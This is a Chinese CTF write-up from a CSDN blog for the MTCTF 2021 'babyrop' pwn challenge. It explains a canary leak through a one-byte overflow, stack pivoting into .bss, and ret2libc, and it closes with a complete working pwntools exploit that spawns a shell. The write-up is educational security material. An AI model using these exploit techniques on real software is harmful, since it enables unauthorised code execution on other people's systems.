2021 美团MTCTF babyrop

最新推荐文章于 2022-11-18 00:32:33 发布
最新推荐文章于 2022-11-18 00:32:33 发布
阅读量714 收藏
点赞数
分类专栏: PWN WP 文章标签: PWN CTF ROP WP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33769475/article/details/121980411
版权
WP 同时被 2 个专栏收录
3 篇文章 0 订阅
订阅专栏
PWN
1 篇文章 0 订阅
订阅专栏

Canary机制的绕过+栈迁移

漏洞分析

拿到题目检查保护和链接的动态库(题目给的是libc-2.27.so,分析本地的/lib/x86_64-linux-gnu/libc.so.6就行)

这题的重点在于Canary保护

┌──(root💀e267254b2ec9)-[/home/babyrop]
└─# checksec babyrop
[*] '/home/babyrop/babyrop'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
 
┌──(root💀e267254b2ec9)-[/home/babyrop]
└─# ldd babyrop
        linux-vdso.so.1 (0x00007ffd2c1d3000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ff900d17000)
        /lib64/ld-linux-x86-64.so.2 (0x00007ff900eea000)

逆向分析,程序流程是先输入name,然后输入password进入vuln,vuln很明显溢出了16个字节,少的可怜的溢出,并且有canary的保护

main

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int i; // [rsp+0h] [rbp-30h]
  char *v5; // [rsp+8h] [rbp-28h] BYREF
  char v6[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+28h] [rbp-8h]

  v7 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("What your name? ");
  for ( i = 0; i <= 24; ++i )
  {
    if ( (unsigned int)read(0, &v6[i], 1uLL) != 1 || v6[i] == 10 )
    {
      v6[i] = 0;
      break;
    }
  }
  printf("Hello, %s, welcome to this challenge!\n", v6);
  puts("Please input the passwd to unlock this challenge");
  __isoc99_scanf("%lld", &v5);
  if ( v5 == "password" )
  {
    puts("OK!\nNow, you can input your message");
    vuln();
    puts("we will reply soon");
  }
  return 0;
}

vuln

unsigned __int64 vuln()
{
  char buf[24]; // [rsp+0h] [rbp-20h] BYREF
  unsigned __int64 v2; // [rsp+18h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  read(0, buf, 0x30uLL);
  return __readfsqword(0x28u) ^ v2;
}

利用思路

如何getshell,我的思路是分三步

  • 获取canary
  • 因为溢出的字节数不够,但rbp和rsp可以覆盖,leave也比较多,因此可以考虑栈迁移的方式
  • ret2libc,因为没有system、bin_sh,需要构造两个栈,第一个栈用来泄露某个函数的实际地址,比如puts,这样就能计算出libc的基地址了,第二个栈用来getshell

0x1 获取canary

canary的值每次运行都不一样,但一旦运行它就不变了,此程序canary是在fs:28h中,但我们依然可以用某种方式去获取canary,比如此程序在main函数的开头把canary的值放到了rbp+var_8中,因此接下来就是思考如何获取rbp+var_8的值了

mov     rax, fs:28h
mov     [rbp+var_8], rax

从反汇编的C很快看出v7就是canary,并且紧接这v6字符串,这就很危险了,因为v6字符串通常是用来打印的,如果能和v7拼接上,那么就可以泄露canary

  char v6[24]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v7; // [rsp+28h] [rbp-8h]

往下看,发现特么循环了25次!!!溢出了一个字节,因此可以和canary拼接上的!

  for ( i = 0; i <= 24; ++i )
  {
    if ( (unsigned int)read(0, &v6[i], 1uLL) != 1 || v6[i] == 10 )
    {
      v6[i] = 0;
      break;
    }
  }

为什么要和canary拼接上?因为canary的随机值低位是00,它就是不让你去拼接的,如果循环次数是24次,永远都不可能拼上。。。

调试举个canary的例子,0x9ae6f96367c48800是canary的值,我输入了24个字节的A和00没拼上,这样就防止了canary的泄露

pwndbg> x /40xb 0x7ffcb560da00
0x7ffcb560da00: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffcb560da08: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffcb560da10: 0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0x7ffcb560da18: 0x00    0x88    0xc4    0x67    0x63    0xf9    0xe6    0x9a
0x7ffcb560da20: 0xb0    0x08    0x40    0x00    0x00    0x00    0x00    0x00

但是如果输入25个A,把00低位覆盖,那么就可以泄露canary啦,像下面这样

┌──(root💀e267254b2ec9)-[/home/babyrop]
└─# ./babyrop
What your name? 
AAAAAAAAAAAAAAAAAAAAAAAAA
Hello, AAAAAAAAAAAAAAAAAAAAAAAAA;�p��a@, welcome to this challenge!
Please input the passwd to unlock this challenge

在获取了canary的值后,我们就可以安心的进行栈溢出了,只需要把canary在栈上的位置覆盖成泄露的canary就能绕过保护

可以看下面的汇编,可知,rbp上8个字节只需要覆盖成canary即可绕过

mov     rcx, [rbp+var_8]
xor     rcx, fs:28h
jz      short locret_4008A2

0x2 栈迁移

在绕过canary后却只能覆盖rbp和rsp,而rbp在程序中又没有bss地址的泄露(可能是没有用到全局变量的原因),因此我们去内存上找bss,对main断点,然后r到main,再通过gdb内的vmmap命令可以找到一些可读写权限的bss段,比如下面0x601000~0x602000都是可读写的

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
          0x400000           0x401000 r-xp     1000 0      /home/babyrop/babyrop
          0x600000           0x601000 r--p     1000 0      /home/babyrop/babyrop
          0x601000           0x602000 rw-p     1000 1000   /home/babyrop/babyrop
    0x7f2ffd831000     0x7f2ffd833000 rw-p     2000 0      [anon_7f2ffd831]
    0x7f2ffd833000     0x7f2ffd859000 r--p    26000 0      /usr/lib/x86_64-linux-gnu/libc-2.32.so
    0x7f2ffd859000     0x7f2ffd9a2000 r-xp   149000 26000  /usr/lib/x86_64-linux-gnu/libc-2.32.so
    0x7f2ffd9a2000     0x7f2ffd9ed000 r--p    4b000 16f000 /usr/lib/x86_64-linux-gnu/libc-2.32.so
    0x7f2ffd9ed000     0x7f2ffd9ee000 ---p     1000 1ba000 /usr/lib/x86_64-linux-gnu/libc-2.32.so
    0x7f2ffd9ee000     0x7f2ffd9f1000 r--p     3000 1ba000 /usr/lib/x86_64-linux-gnu/libc-2.32.so
    0x7f2ffd9f1000     0x7f2ffd9f4000 rw-p     3000 1bd000 /usr/lib/x86_64-linux-gnu/libc-2.32.so
    0x7f2ffd9f4000     0x7f2ffd9fa000 rw-p     6000 0      [anon_7f2ffd9f4]
    0x7f2ffda06000     0x7f2ffda07000 r--p     1000 0      /usr/lib/x86_64-linux-gnu/ld-2.32.so
    0x7f2ffda07000     0x7f2ffda27000 r-xp    20000 1000   /usr/lib/x86_64-linux-gnu/ld-2.32.so
    0x7f2ffda27000     0x7f2ffda30000 r--p     9000 21000  /usr/lib/x86_64-linux-gnu/ld-2.32.so
    0x7f2ffda30000     0x7f2ffda31000 r--p     1000 29000  /usr/lib/x86_64-linux-gnu/ld-2.32.so
    0x7f2ffda31000     0x7f2ffda33000 rw-p     2000 2a000  /usr/lib/x86_64-linux-gnu/ld-2.32.so
    0x7ffcdec85000     0x7ffcdeca6000 rw-p    21000 0      [stack]   
    0x7ffcded0f000     0x7ffcded13000 r--p     4000 0      [vvar]    
    0x7ffcded13000     0x7ffcded14000 r-xp     1000 0      [vdso]

特别注意!bss不能两次重复写,这是我两次重复写在exp中调试的结果报错,因此我们需要拿出两段bss1(0x601a00)和bss2(0x601b00)

pwndbg> c
Continuing.
[Attaching after process 2902 vfork to child process 2936]
[New inferior 2 (process 2936)]
[Detaching vfork parent process 2902 after child exec]
[Inferior 1 (process 2902) detached]
process 2936 is executing new program: /usr/bin/dash
Warning:
Cannot insert breakpoint 1.
Cannot access memory at address 0x400717
Cannot insert breakpoint 2.
Cannot access memory at address 0x40072e
Cannot insert breakpoint 5.
Cannot access memory at address 0x40073f
Cannot insert breakpoint 3.
Cannot access memory at address 0x400744
Cannot insert breakpoint 4.
Cannot access memory at address 0x40086e

0x3 ret2libc

在vuln中,我们直接取这一段0x40072E作为每次溢出的attack function,它会把当前rbp往前0x20个字节(递减)从低地址往高地址进行读入

.text:000000000040072E                 lea     rax, [rbp+buf]
.text:0000000000400732                 mov     edx, 30h ; '0'  ; nbytes
.text:0000000000400737                 mov     rsi, rax        ; buf
.text:000000000040073A                 mov     edi, 0          ; fd
.text:000000000040073F                 call    _read

所以我们第一次输入先改变rbp和rsp就行,输入’A’*24 + p64(canary) +p64(bss1+0x20) + p64(0x40072E),这样read后,vuln快结束时执行leave和ret,rbp就指向了一段bss(让第二次输入从bss地址开始往下),sp指向0x40072E再次进行一次溢出输入,此时第二次输入就构造出一个可用于泄露函数实际地址的栈空间payload = p64(pop_rdi_ret) + p64(puts_got) + p64(0x40086E) + p64(canary) + p64(bss1-0x8) + p64(leave_ret),这里最关键的一点是0x40086E而不是puts的plt地址,因为sp为这段地址后会执行vuln,这样我就省了一次在bss上布置执行vuln的栈空间了。这里参数通过pop rdi,让下面的call puts去打印puts的实际地址,然后也不需要管sp了,自觉再来一次vuln

.text:0000000000400867                 lea     rdi, aOkNowYouCanInp ; "OK!\nNow, you can input your message"
.text:000000000040086E                 call    _puts
.text:0000000000400873                 mov     eax, 0
.text:0000000000400878                 call    vuln

按照前面的思路,后面的ret2libc就很简单了,只需要再来一次栈溢出,在bss2上构造一段可以ret2libc的数据就可以getshell了,结构和前面一样,具体可参考EXP

EXP

# encoding: utf-8
from os import system
from pwn import *
context(os='linux', arch='amd64', log_level='debug')


if __name__ == "__main__":
    p = process("./babyrop")
    p.recv()
    payload1 = 'A'*25
    p.send(payload1)
    canary = p.recv()
    canary = canary[32:39]
    canary = canary.rjust(8, '\x00')
    canary = u64(canary)
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    elf = ELF("./babyrop")

    #栈迁移,让rbp、rsp都指向一段可执行的bss1内存空间,泄露puts
    v5 = '4196782'
    bss1 = 0x601a00
    bss2 = 0x601b00
    p.sendline(v5)
    p.recv()
    payload2 = 'A'*24 + p64(canary) + p64(bss1 + 0x20) + p64(0x40072E)
    p.send(payload2)

    puts_plt = elf.plt['puts']
    puts_got = elf.got['puts']
    pop_rdi_ret = 0x400913
    leave_ret = 0x400759
    payload3 = p64(pop_rdi_ret) + p64(puts_got) + p64(0x40086E) + p64(canary) + p64(bss1-0x8) + p64(leave_ret)
    p.send(payload3)


    puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
    print(hex(puts_addr))
    libc_base = puts_addr - libc.sym['puts']
    #print(hex(libc_base))
    bin_sh_addr = libc_base + libc.search('/bin/sh\x00').next()
    sys_addr = libc_base + libc.sym['system']


    #ret2libc
    payload4 = "A"*24 + p64(canary) + p64(bss2 + 0x20) + p64(0x40072E)
    p.send(payload4)

    payload5 = p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(sys_addr) + p64(canary) + p64(bss2 - 0x8) + p64(leave_ret)
    p.send(payload5)

    p.interactive()

getshell!

image-20211216174336534

Re1own
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第四届2021美团网络安全 MT-CTF writeup
ShenZ的博客
12-12 5639
第四届2021美团网络安全 MT-CTF 文章目录第四届2021美团网络安全 MT-CTFMISCUn(ix)zip오징어 게임 鱿鱼游戏BoomCryptoSymbol MISC Un(ix)zip flag{Welc0me_Unz1p_Wonder4} 오징어 게임 鱿鱼游戏 7-zip可以看到加密算法ZipCrypto Store 再加上备注里提示flagornot.txt,采用明文爆破 明文爆破参考:https://blog.csdn.net/q851579181q/articl
MTCTF2021-GrandTravel
anwen12的博客
12-24 871
GrandTravel 0x01 知识点 nosql注入+ssrf+node反序列化+node拆分攻击+ftp提权 0x02 解题 1 sql注入拿到密码 首先拿到源码不难看出登录位置有注入嫌疑(感谢葫芦卜师傅的payload) 参考 https://blog.szfszf.top/article/9/ burp0_data = {"username": f"admin\"&&this[\"pass\"+\"word\"][{pos}]>\"{chr(mid)}\"&&am
[MTCTF 2021]hamburgerRSA(部分可知问题求解)
shshss64的博客
11-18 362
n部分值已知
re学习笔记(73)2021美团CTF-Re-100mazes
逆向随笔
05-28 659
刚开始想对伪代码进行处理,但是需要修改的太多;比较菜不太会处理。 之后发现每个函数的栈空间都是一样的。就拜托pwn手来写gdb脚本来提取一下数据。 为了方便一下子取出来。使用idapython将程序退出的地方进行了patch,这样就算输入错误程序还是会向下运行,方便提取数据。 首先是idapython脚本patch退出的点(idapython临时学了一下,写的可能有些笨) import idc,idautils,idaapi funcs = idautils.Functions() for i in fun
ctf2021/1/14
u012163017的博客
01-19 339
CTF笔记汇编地址总线功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 汇编 地址总线 寻址能力 : 一个cpu有N根地址线,则可以说这个CPU的地址总线的宽度为N。这样的CPU最多可寻找2的N次方个内存单元。 一个字节是一个内存
2019-2021美团技术年货-后端篇
10-21
【2019-2021美团技术年货-后端篇】是美团技术团队在三年间积累的后端技术精华,涵盖了日志记录、缓存架构、图数据库、服务治理、分布式训练、Serverless、在线服务演进等多个领域的实践成果。下面将对其中的一些关键...
2019-2021美团技术年货-综合篇
10-21
《2019-2021美团技术年货-综合篇》涵盖了美团在数据、安全、测试和实时数仓建设等多个技术领域的实践与探索。本文将深入解析这些关键领域的核心知识点。 一、数据领域 1. 实时数仓建设:美团外卖构建实时数仓的...
2021美团商业分析精英大赛参赛代码.zip
最新发布
10-22
"2021美团商业分析精英大赛参赛代码.zip" 这个标题揭示了这个压缩包的内容是参加2021年美团商业分析精英大赛的选手们提交的代码。这个比赛可能涉及到了对美团业务数据的深度分析,通过编程技术来解决实际的商业问题...
2019-2021美团技术年货-前端篇
10-21
【2019-2021美团技术年货-前端篇】涵盖了美团技术团队在前端领域的诸多实践和创新,特别是在跨端开发、性能优化、工具链构建以及平台融合技术等方面的重要成果。以下是对其中一些关键知识点的详细解读: 1. **...
2021年美团技术分享年货
02-07
2021年美团技术分享包含数据,开发,架构,前端开发,安全等内容
美团杯MEITUAN网络安全大赛CTF2021-humburgerRSA题解
Laffrey的专栏
12-12 800
题目如下: output.txt n = 177269125756508652546242326065138402971542751112423326033880862868822164234452280738170245589798474033047460920552550018968571267978283756742722231922451193 c = 47718022601324543399078395957095083753201631332808949406927091589044837
“蚁景杯”WUSTCTF2021新生赛writeup
weixin_45883223的博客
01-30 4548
“蚁景杯”WUSTCTF2021新生赛writeupCrypto签到滴答AES With RSAGMCVigeneregive you d银河信号MiscErxian BridgeZero Widthbinarybase64Tall ShanBenhideReverseX0rbabypycbabyjvavequationsez_resosotablesWebEasyWebWeb2矛盾命令执行CoverEasyUploadBabyPHPPwn你管这叫新生赛?shellcodeez_heap2.272.23获取
ctf xor题_【技术分享】一道有趣的CTF PWN题
weixin_39582708的博客
12-19 615
稿费:200RMB(不服你也来投稿啊!)投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿这是CSAW CTF 2016的一道pwn300的题。这道题的利用思路不错,分享下。本地运行题目socatTCP4-LISTEN:10001,forkEXEC:./hungman运行这条命令可以让 程序的标准输入输出都重定向到 10001端口,所以我们可以nc连过去分析拿到一道题首先看看...
GDB 调试 多进程 问题
feifly329的专栏
05-04 1198
GDB 调试 遇到多进程,断点跟不下去 报错。。 [Attaching after process 26084 vfork to child process 26088] [New inferior 2 (process 26088)] [Detaching vfork parent process 26084 after child exec] [Inferior 1 (process 26...
格式化字符串漏洞利用时计算的偏移到底是什么?
weixin_48066554的博客
02-07 2383
格式化字符串漏洞利用时计算的偏移到底是什么? 我们平时在自己做题或者是看大佬们的wp时都会看见这种说法 说法一: 说法二: 相信有不少半路出家的小白都和我一样都只是知其然不知其所以然,那这里所说的“偏移”到底是什么意思呢? 我们结合这道题来详细讲一讲这些个偏移量所具体代表的意思 先来看伪代码 //main函数 void __fastcall __noreturn main(int a1, char **a2, char **a3) { int v3; // [rsp+24h] [rbp-Ch] BY
ISCC 2021 WP
夏日 の blog
05-25 7145
MISC 李华的红包 打开发现是一个图片,binwalk分离下文件后得到一个txt文件,内容如下 24,43,13,13,12,21,43 很明显是敲击码(如果改下图片大小为521*521会看到下面有个鼓也会提示这是敲击码) 分别对应着ISCCBFS ISCC{ISCCBFS} Retrieve the passcode 解压后得到一个压缩包和一个名为scatter的txt文档 打开txt文档发现 1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5
[MRCTF2020]Ezaudit
fmyyy1的博客
04-20 306
场景(说实话现在看到这种具体场景的都会心脏骤停一下) 扫路径扫到个www.zip <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ $username = $_POST['username']; $password = $_POST['password']; $Private_key = $_POST['Private_
BUUCTF 每日打卡 2021-5-20
weixin_52446095的博客
05-20 288
引言 无 EasyProgram 题目给了一堆伪代码: get buf unsign s[256] get buf t[256] we have key:whoami we have flag:??? for i:0 to 256 set s[i]:i for i:0 to 256 set t[i]:key[(i)mod(key.lenth)] for i:0 to 256 set j:(j+s[i]+t[i])mod(256) swap:s[i],s[j] for m:0 to 38 set i:(i +
StarCTF2021-MISC-Writeup
末初的CSDN博客
01-20 1183
文章目录signinMineGamelittle trickspuzzleFeedback signin Welcome to *CTF 2021, join telegram to get flag: https://t.me/starCTF *CTF{we1c0me_to_the_starCTF2021~} MineGame If you love reverse, you can try it, otherwise, you must finish it as quickly as pos
2021美团技术年报:1257页精华研究报告与解决方案
"2021美团技术年货合辑是一份包含1257页的电子书,由美团技术团队在2022年春节期间精心编撰。这份电子书汇集了过去一年中发布的50多篇技术文章,以及20多篇国际顶级学术会议论文,旨在回顾和分享美团公司在算法、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值